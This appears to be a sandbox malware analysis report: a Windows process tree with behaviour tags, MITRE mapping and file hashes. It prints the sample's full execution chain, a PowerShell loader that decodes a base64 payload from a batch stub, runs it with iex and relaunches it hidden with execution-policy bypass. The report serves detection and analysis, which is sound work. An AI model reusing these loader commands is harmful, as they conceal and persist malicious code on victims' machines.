C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3160
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Users\Admin\AppData\Local\$ktm-powershell.exe"C:\Users\Admin\AppData\Local\$ktm-powershell.exe" -ep bypass -ec JABtAHQAeAAgAD0AIAAiAEcAbABvAGIAYQBsAFwASABqAFgAQgBGADUAWgBPADcAaQBVAGkAdgBoADkAWgBRAE0AYQBtACIAOwAgACQAbQB0AHgATwBiAGoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4ATQB1AHQAZQB4AF0AOgA6AE8AcABlAG4ARQB4AGkAcwB0AGkAbgBnACgAJABtAHQAeAApADsAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApACAAewAgACQAbQB0AHgATwBiAGoALgBXAGEAaQB0AE8AbgBlACgAKQA7ACAAJABtAHQAeABPAGIAagAuAFIAZQBsAGUAYQBzAGUATQB1AHQAZQB4ACgAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAGYAIAAkAHsAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQB9AFwAYAAkAGsAdABtAC0AbABvAGEAZABlAHIALgBwAHMAMQAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7ACAARQB4AGkAdAAgADAAOwAgAH0A4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3572
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3984
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3600
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4132
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3104
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:1500
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2988
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4540
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:1072
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:2296
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000144 0000008c1⤵PID:3248
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f0 0000008c1⤵PID:1820
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000124 0000008c1⤵PID:796
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f4 0000008c1⤵PID:4804
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000120 0000008c1⤵PID:2440
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f8 0000008c1⤵PID:3676
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001b4 0000008c1⤵PID:668
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001b8 0000008c1⤵PID:1016
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000018c 0000008c1⤵PID:3688
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000124 0000008c1⤵PID:2784
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000120 0000008c1⤵PID:3396
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000168 0000008c1⤵PID:1432
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
128KB
MD5a9ae270f03cd818fc5ccb1fc114ed0f8
SHA157cfce4c18c0163fd41652ab89e4c51649eee492
SHA256c08bb34abb284c2fb15d4372c2c3c2387f71ebeb920be89c9079e96c7a4ca3ec
SHA5125fa35050038e187b0be9547ff86e49aa5272a273eefb83472758da5b818e4e86eba254422b4524fb7a4bd66bd5c3ae210162cab1247b601ea1a3fc6454703ef0
-
Filesize
699KB
MD5a89ae42f5a026c19299f9fa3278556cd
SHA1ec0a61aa2b89c9f80c734006446f124530e0f66b
SHA25694ddaf67c6973113ef2992feab11bd2147194541c8c8efc82f7b51e89fc08a25
SHA512fad978dd060c6a507d8be487d8478f4f550c2e3fa440c8b3f90c19771f9e2b0d34ead3fad6f026ea233bbd5ec0f5274b7dc6bab4ea4d090322d4406edd3a836e
-
Filesize
3KB
MD5b133a676d139032a27de3d9619e70091
SHA11248aa89938a13640252a79113930ede2f26f1fa
SHA256ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15
SHA512c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5
-
Filesize
29KB
MD5ffdeea82ba4a5a65585103dd2a922dfe
SHA1094c3794503245cc7dfa9e222d3504f449a5400b
SHA256c20b11dff802aa472265f4e9f330244ec4aca81b0009f6efcb2cf8a36086f390
SHA5127570527fdae4818f0fc780f9f141ab6a2d313cc6b3fdb1f7d7ff05d994ad77d3f8d168b1d77c2555d25dc487d24c18f2cc0eab505d1dd758d709f2576aac1a8a